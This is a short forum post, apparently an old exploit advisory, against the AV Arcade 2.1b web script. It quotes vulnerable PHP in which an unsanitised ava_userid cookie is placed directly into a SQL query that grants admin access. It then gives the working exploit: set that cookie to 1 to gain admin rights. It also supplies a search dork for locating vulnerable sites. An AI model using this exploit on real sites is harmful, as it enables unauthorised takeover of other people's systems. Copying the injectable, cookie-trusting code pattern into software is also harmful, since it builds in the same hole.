Jump to content
kw3rln

[RST] AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights

Recommended Posts

Posted

AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin Rights

Web: AV Arcade 2.1b

Site : www.avscripts.net

Dork : "Powered By AV Arcade"

Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]

Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nET

Vurnerable code: admin/index.php:

$sql = mysql_query("SELECT * FROM ava_users WHERE id=".$_COOKIE['ava_userid']."");

while($row = mysql_fetch_array($sql)){

if ($row['admin'] == 1) {

define( 'ADMIN_ACCESS', 1 );

[...]

Exploit:

Set in your cookies: ava_userid = 1; and that`s all :P

GREETZ: all memberz of RST and milw0rm

//kw3rln [ http://rstzone.net ]

[EOF]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...